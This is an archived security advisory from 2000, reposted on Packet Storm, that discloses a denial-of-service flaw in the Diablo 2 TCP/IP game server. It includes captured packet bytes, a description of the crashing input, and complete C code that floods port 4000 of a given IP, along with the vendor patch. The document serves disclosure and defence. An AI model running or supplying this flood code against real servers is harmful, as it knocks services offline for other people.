exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

spad02.txt

spad02.txt
Posted Aug 24, 2000
Site secpoint.com

Security Point Advisories #2 - Diablo 2 TCP/IP Server has a DOS vulnerability that allows anyone who can connect on port 4000 to crash the game. Vulnerable versions: Diablo 2 1.0, 1.01, 1.02, 1.03. Fix available here.

tags | denial of service, tcp
SHA-256 | b26f84a0c7361a7edf0e302f395e9b83e79ad0422df53972120ed1b86a2807b6

spad02.txt

Change Mirror Download
      Security Point
info@secpoint.com
http://www.secpoint.com/

Advisory #002
Title: Diablo 2 TCP/IP Sever DoS
Date: 21-08-00


Copyright (c) 2000 SECURITY POINT

Contents:
=========

I Disclaimer
II Introduction
III Description
IV Demonstration code
V Fix
VI Contact
VII Job Offers
VIII Greetings

I - Disclaimer:
===============

This paper is for educational purpose only, Security Point will not be
responsible for any damages whatsoever that have a connection with the
information written in this paper. There are no warranties with regard
to this information, any use of this information is at the user's own risk.

II - Introduction:
==================

We have found a vulnerability in Diablo 2 TCP/IP Server running on port 4000.
If some malformed data is being send to port 4000 while running it will result
in the game crashing. Though windows will NOT crash with it.

III - Description:
==================

While playing around with Diablo2 on port 4000, I discovered some
problems with the TCP/IP Server. When a TCP/IP game in D2 was running, and
connected to port 4000, then sent some info, it came with a "Diablo II Server
Error".
Anyway, this bug turned out to be irregular.

So i began to explore the D2 TCP/IP Server some more. Then while listing on
port 4000 with a program, and trying to create a game, I discovered that D2
sends the following data, to the port if its occupied:

RAW:
>`
>f‚?g
>eÿ§
>
>
>eÿ§
>
>
>eÿ§
>
>lûJM
>eª§
>è#+ê:Í»ÞùJM
ASCII codes:
>96-0-169-5-24-121-169-5-216-9-0-0-7-2-0-0-176-1-3-0-0-71-114-89-112-72-111-78-45-68-75-0-0-0-0-0-52-0-0-4-0-0-0-0-0
>102-135-234-40-0-0-0-0-0
>101-255-167-3-0-0-85-170-85-170-71-0-0-0-71-114-89-112-72-111-78-45-68-75-0-0-0-0-0-0-0-0-0-0-221-0-16-0-130-0-3-0-1-0-255-255-255-255-255-48-255-27-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-0-255-0-255-0-255-0-255-0-255-0-255-0-255-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0
>0-0-0-0-0-104-110-69-50-87-111-111-33-6-0-0-0-42-1-1-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0
>0-0-0-0-0-0-0-12
>101-255-167-3-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0
>0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-87-83-1-0-0-0-80-0-2-1-1-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-2-1-1-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-2-1-1-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0
>0-0-0-0-0-1-119-12
>101-255-167-3-0-0-52-0-4-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-103-102-207-127-0-25-0-0-0-15-0-0-0-20-0-0-0-25-0-0-0-0-55-0-0-0-55-0-0-0-15-0-0-0-15-0-0-0-89-0-0-0-89-0-0-1-0-0-0-101-1-0-0-77-0-0-0-105-102-0-0-0-0-0-0-0-0-0-0-0-0
>0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-74-77-10-0-74-77-16-0-2-0-0-1-160-149-4-0-0-0-0-0-0-40-201-109-188-122-114-254-176-249-7-74-77-16-0-2-0-0-1-160-149-4-0-0-0-0-2-0-200-27-143-165-24-197-31-154-251-7-74-77-16-0-2-0-0-1-160-149-4-0-0-0-0-4-0-104-110-176-142-186-23-65-131-249-7-74-77-16-0-2-0-0-1-160-149-4-0-0-0-0-6-0-8-193-209-119-88-106-98
>108-251-7-74-77-16-0-12
>101-170-167-3-0-0-2-0-0-1-0-18-4-0-0-0-0-210-0-168-19-243-96-250-188-131-85-1-0-74-77-16-0-2-0-0-1-16-18-4-0-0-0-0-146-0-72-102-20-74-152-15-165-62-3-0-74-77-16-0-0-0-0-1-32-17-4-0-0-0-0-82-0-40-92-197-216-93-127-50-249-4-0-74-77-16-0-0-0-8-1-80-77-4-0-0-12-24-0-0-112-127-12-188-99-44-157-92-248-7-74-77-16-0-2-0-4-1-144-65-4-0-0-46-48-0-0
>232-35-43-234-58-205-187-222-249-7-74-77-16-0-2-0-5-1-80-76-4-0-0-24-24-0-0-136-118-76-211-216-31-221-199-251-7-74-77-0-0-74-77-0-0-0-0-0-0-74

(without the ">"'s, ascii code separated by "-")

Maybe this can be some sort of shutdown message, that D2 sends if the server
wasn't shut down properly? In this data there where 3 eÿ§'s, so I started
testing how the D2 TCP/IP Server would respond if I sent some of them. At
first there wasn't much respond from the server, but if i sendt:

eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§\n

some (5-10) times in a row, it would come with the following message:

---------------------------------------------------------------------------
- Diablo II Server Error -X-
---------------------------------------------------------------------------
- /\ Assertion Failure -
- / \ Location: C:\D2\Source\Fog\Src\QServer\Qserver98.cpp, line #272 -
-/____\ Expression: nSize >= 0 && nSize < READ_BUFFER_SIZE -
- --------------- -
- - OK - -
- --------------- -
---------------------------------------------------------------------------

When you click OK it would crash diablo2. Then I tried with much more
eÿ§'s, that resolved in that i only had to send something 1 time. If I
tried with a lot of eg. A's then it wouldn't crash, but if I tried with one
of the other "commands" then it would also respond with the error.

IV - Demonstration code
=======================
/*
* SPD2-DoS.c
*
* SECURITY POINT -- http://www.secpoint.com
*
* (C) COPYRIGHT SECURITY POINT 2000
* All Rights Reserved
*
* This source code is for educational purpose ONLY, Security Point will not
* be responsible for any damages whatsoever that have a connection with this
* code. There are no warranties with regard to this information.
*
* USE AT YOUR OWN RISK, BY USING THIS PROGRAM YOU ACCEPT ALL

* RESPONSIBILITY FOR THE RESULTS

*
* For questions and suggestions email info@secpoint.com
*
* gcc SPD2-DoS.c -o SPD2-DoS
*
*
*/


#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netdb.h>
#include <string.h>


#define OFFSET 10000

struct in_addr addr;
struct sockaddr_in address;
int d2_socket;
char sendbuffer[OFFSET];

main (int argc, char *argv[]) {
printf("Diablo 2 TCP/IP Server DoS, by http://www.secpoint.com\n");
if (argc != 2) {
printf("Usage: %s ip\n", argv[0]);
exit(0);
}
if ((d2_socket = socket(AF_INET, SOCK_STREAM,0)) < 0) {
perror("socket");
exit(0);
}
address.sin_family=AF_INET;
address.sin_addr.s_addr = inet_addr(argv[1]);
address.sin_port = htons(4000);
if (connect(d2_socket, (struct sockaddr*)&address, sizeof(address)) < 0) {
perror("connect");
exit(0);
}
memset(sendbuffer, 0x60, sizeof(sendbuffer));
while(1) {
write(d2_socket, sendbuffer, strlen(sendbuffer));
}
close(d2_socket);
printf("server killed\n");
}

V - Fix:
========
Vulnerable versions: Diablo 2 1.0, 1.01, 1.02, 1.03
Download the new patch from blizzard.com:
(http://www.blizzard.com/support/diablo2/information/patch.shtml)

VI - Contact:
=============

If you have further questions regarding this bug, then you can contact us at
www.secpoint.com
info@secpoint.com

VII - Job Offers:
=================
We are looking for people for:
Penetration testing of Firewalls and TCP/IP based networks.
You must have a wide knowledge of TCP/IP protocols and applications, plus solid
technical experience of UNIX or Windows NT.
The best candidate will have security experience in one or more of the
following:

ú Penetration testing.
ú Linux and other network operating systems .
ú Web technologies: HTML, XML, JavaScript, Java, php, and asp.
ú Firewall, VPN and intrusion detection integration.
ú Product Certs and other forms of education.
ú Routers, hubs, switches.


Finally, successful candidates must have the ability to take on responsibility
and work unsupervised in our offices and on customer sites. They must also be
able to communicate their findings to client staff via written reports and
presentations.
Another important factor is that you have a CLEAN criminal record.

Send your CV to info@secpoint.com (in MS Word, PDF or plain text formats)

http://www.secpoint.com


VIII - Greetings:
=================
: SecurityFocus.com, ADM

Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    14 Files
  • 15
    Oct 15th
    49 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close